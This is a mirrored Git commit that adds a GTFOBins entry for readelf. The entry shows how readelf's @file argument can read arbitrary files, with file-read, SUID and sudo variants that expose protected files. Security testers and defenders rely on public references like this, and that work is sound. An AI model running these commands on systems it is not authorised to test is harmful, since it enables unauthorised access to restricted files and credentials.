mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Create readelf.md
This commit is contained in:
		
							
								
								
									
										18
									
								
								_gtfobins/readelf.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										18
									
								
								_gtfobins/readelf.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,18 @@ | ||||
| --- | ||||
| description: | | ||||
|   Each line is corrupted by a prefix string and wrapped inside single quotes. | ||||
|  | ||||
| functions: | ||||
|   file-read: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         readelf -a @$LFILE | ||||
|   suid: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         readelf -a @$LFILE | ||||
|   sudo: | ||||
|     - code: | | ||||
|         LFILE=file_to_read | ||||
|         sudo readelf -a @$LFILE | ||||
| --- | ||||
		Reference in New Issue
	
	Block a user